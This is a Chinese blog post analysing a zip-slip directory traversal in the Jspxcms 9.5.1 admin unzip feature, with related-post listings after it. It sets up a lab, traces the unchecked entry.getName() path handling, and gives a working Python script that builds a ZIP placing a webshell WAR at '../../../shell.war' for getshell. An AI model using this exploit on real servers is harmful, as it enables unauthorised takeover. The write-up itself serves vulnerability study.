Jspxcms-9.5.1由zip解压功能导致的目录穿越漏洞分析

于 2023-12-26 16:55:03 发布
阅读量601 收藏 8
点赞数 5
文章标签: 渗透测试 网络安全 java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/st3pby/article/details/135226272
版权

Jspxcms 是企业级开源网站内容管理系统,支持多组织、多站点、独立管理的网 站群,也支持 Oracle、SQL Server、MySQL 等数据库。

Jspxcms-9.5.1 及之前版本的后台 ZIP 文件解压功能存在目录穿越漏洞,攻击者可以利用该漏洞,构造包含恶意 WAR 包的 ZIP 文件,达到 Getshell 的破坏效果

环境配置

在 MySQL 中创建数据库,字符集选择为utf8或者utf8mb4(支持更多特殊字符如表情字符 emoji,推荐)。
执行数据库脚本。数据库脚本在database目录下。

create database jspxcms;
use jspxcms;
source mysql.sql;

image-20231226151042978

找到 Tomcat 的安装目录,将 webapps 目录下 ROOT 文件夹删除(也可将webapps 目录下所有文件夹都删除)。建议使用干净的 Tomcat,不要部署其它应用。将下载包中的 ROOT 文件夹拷贝到 tomcat/webapps 目录下。

打开/ROOT/WEB-INF/classes/application.propertis文件,根据实际情况修改
spring.datasource.urlspring.datasource.usernamespring.datasource.password
的值。

image-20231226151540937

双击 tomcat/bin/startup.bat 文件启动即可

image-20231226152602981

漏洞分析

后台http://192.168.111.140:8080/cmscp/index.do admin 默认密码为空

使用 Burp Suite 进行抓包可以发现“解压文件”的接口调用情况

image-20231226154112539

该接口对应 jspxcms-9.5.1-release-src/src/main/java/com/jspxcms/core/web/back/WebFileUploadsController.java 的 unzip 方法

image-20231226155010095

对 unzip 方法进行跟进,发现它的具体实现在/jspxcms-9.5.1-release-src/src/main/java/com/jspxcms/core/web/back/WebFileControllerAbstractor.java 中。在对 ZIP文件进行解压时,程序调用了 AntZipUtil 类的 unzip 方法

image-20231226155524110

对 AntZipUtil 类的 unzip 方法进行跟进,可发现该方法未对 ZIP 压缩包中的文件名进行参数校验就进行文件的写入。这样的代码写法会引发“目录穿越漏洞”:

代码中使用 entry.getName() 获取 ZIP 条目的名称,并将其用作目标文件的路径

image-20231226161220395

漏洞利用

创建包含jsp webshell的war包:

image-20231226162902007

制作恶意 ZIP 文件

import zipfile 
if __name__ == "__main__":
    try:
        binary = b'test' 
        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("test.zip")
        with open('shell.war', 'rb') as file:
            binary_data = file.read()
            zipFile.writestr("../../../shell.war", binary_data)
        zipFile.close() 
    except IOError as e:
        raise e

image-20231226164701545

上传文件

image-20231226164726082

点击ZIP解压,shell.war就被解压到了webapps目录

image-20231226164816317

image-20231226164933407

st3pby
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jspxcms 9.5.1 安装包
05-01
Jspxcms 9.5.1 安装包 更新日志:2019-07-281.文件管理save权限将`[email protected]_file_x:save`修正为`[email protected]:web_file_x:save`;2.修复文档管理中正文编辑器保存视频时,会过滤掉视频代码的问题;3....
Zip Slip目录遍历漏洞已影响多个Java项目
cpongo5
06-06 153
\看新闻很累?看技术新闻更累?试试下载InfoQ手机客户端,每天上下班路上听新闻,有趣还有料!\\\近日,专注于开源及云安全监控防范工作的 Snyk 公司披露了一种可能会造成任意文件被覆写的安全漏洞,称为 Zip Slip。其相应的攻击手段是创建一种特制的ZIP缩文件,在其中引用会对目录进行遍历的文件名。受该风险影响的项目多达数千个,包括 AWS Toolkit for Eclipse、Spri...
jspxcms bug表
weixin_34007291的博客
12-28 124
2019独角兽企业重金招聘Python工程师标准>>> ...
Jspxcms 无入侵式开发
烧猪 -- 记事本
01-07 354
Jspxcms 无入侵式开发的基础代码还是很具有结构化的 第一次 就是忽略了 好多细节 如: eclipse 的 那些标记 @Override 没有去掉 一些 @Controller的标记 没有加上 因此 模板化的 代码编写必须使用模板来自动生成 看来得空写个简易模板才行 生成器是必须的................
jspxcms
lastwinn的博客
08-01 1801
jspxcms 先百度一下后台地址 /cmscp/index.do 然后百度默认密码,默认密码为空。 找到一篇rce https://www.hacksec.cn/Penetration-test/1284.html Jspxcms后台的zip功能目录穿越漏洞导致getshell 由于这套CMS做了相关防御配置,缩包里像上文中直接加入JSP文件是无法执行的,会报403错误。因而想到使用目录穿越的方式,跳出JspxCM的根目录,并根据war包会自动的特点,从而...
Python利用zipfile生成linux目录穿越文件
小白博客
11-12 2842
import zipfile if __name__ == "__main__": try: binary = '111' zipFile = zipfile.ZipFile("test2.zip", "a", zipfile.ZIP_DEFLATED) info = zipfile.ZipInfo("test2.zip") zipFile.writestr("../../../../../../dwst.txt", binary).
CAM350-9.5.1-ha.zip
08-19
可以查看,硬件pcb板导出gerber 文件
Jspxcms 安装包 v9.5.1 tomcat版-源码.zip
12-03
缩包密码:www.cqlsoft.com
Jspxcms 源码包 v9.5.1-源码.zip
12-03
缩包密码:www.cqlsoft.com
gitlab-ci-multi-runner-9.5.1-1.x86_64.rpm
08-17
gitlab-ce-9.5.10-ce.0.el7.x86_64.rpm配套runner, 适用于CentOS7及以上系统, 国内下载速度极慢, 8byte/s能下一年
Jspxcms后台的zip功能getshell
m0_46317063的博客
04-25 288
Jspxcms后台的zip功能getshell
一文读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8231
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
node-v4.2.2-headers.tar.xz
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
独栋别墅图纸D020-两层-10.00&11.00米- 施工图.dwg
05-21
独栋别墅图纸D020-两层-10.00&11.00米- 施工图.dwg
ndnav主题1.1-haiyong.zip
05-21
内容概要: "ndnav主题1.1-haiyong.zip"是一个针对特定导航需求设计的主题包,提供了一套优化的界面元素和布局,旨在增强用户体验和导航效率。这个主题可能包含了图标、色彩方案、字体样式等视觉元素的自定义,以及可能的操作流程优化,确保用户能够快速找到所需信息。 适用人群: 此主题适合需要高效导航决方案的用户群体,比如专业领域的工作者、研究人员或是对特定领域有深入了并追求高效率的信息检索者。它也可能适合那些喜欢定制化界面并希望根据个人喜好或工作需求调整导航工具外观和功能的用户。 使用场景及目标: 该主题可用于多种场合,如图书馆、研究机构、学术会议、企业内部信息系统等,任何需要快速而准确导航大量信息资源的环境都会受益。其目标是减少用户在查找和访问信息时的认知负担,通过直观的设计和布局简化用户路径,从而提高工作效率和满意度。 其他说明: 由于没有具体的文件内容,无法提供更详细的功能描述。不过,一般来说,此类主题包的安装和使用可能需要一定的技术知识,用户在安装前应确保理如何应用主题,并遵循相关的安装指南。同时,用户也应该注意检查主题包的兼容性,确保它能够与现有的导航系统无缝协作。
grpcio-1.12.0-cp35-cp35m-manylinux1_i686.whl
最新发布
05-21
Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
xmlpull-1.1.3.1.jar
05-21
javaee/javaweb常用jar包,亲测可用,导入到java工程中即可使用
nutz-1.b.52.jar
05-21
javaee/javaweb常用jar包,亲测可用,导入到java工程中即可使用
xmlbeans-2.3.0.jar
05-21
javaee/javaweb常用jar包,亲测可用,导入到java工程中即可使用
JSPXCMS 部署
08-28
要部署JSPXCMS,首先需要下载Jspxcms源码包。Jspxcms是基于Java、JSP技术开发的国产开源CMS,是制作、维护网站的利器。国内的CMS主要以PHP技术为主,而基于Java、Jsp的CMS数量相对较少,但Jspxcms致力于做最好的Java CMS。 接下来,可以按照以下步骤进行部署: 1. 创建一个目录,例如"jspxcms"。 2. 将下载的Jspxcms源码包缩到该目录中。可以使用以下命令进行缩: ``` unzip jspxcms-9.5.1-release.zip ``` 这将会在当前目录下创建一个名为"jspxcms-9.5.1-release"的文件夹。 3. 可以将缩后的文件夹重新命名为"jspxcms",以便更方便地进行操作: ``` mv jspxcms-9.5.1-release jspxcms ``` 4. 进入"jspxcms"目录: ``` cd jspxcms/ ``` 5. 接下来,可以根据具体需求进行一些配置,例如数据库连接等。 6. 最后,可以将整个"jspxcms"目录部署到Tomcat服务器中,以便运行Jspxcms。Tomcat是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被广泛使用,也是开发和调试JSP程序的首选。 通过以上步骤,您已经成功部署了JSPXCMS,并可以在Tomcat服务器上运行它了。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Jspxcms源码包 v10.1.0](https://download.csdn.net/download/weixin_38643269/14122729)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Tomcat部署与JSPXCMS搭建](https://blog.csdn.net/weixin_46243253/article/details/110825235)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值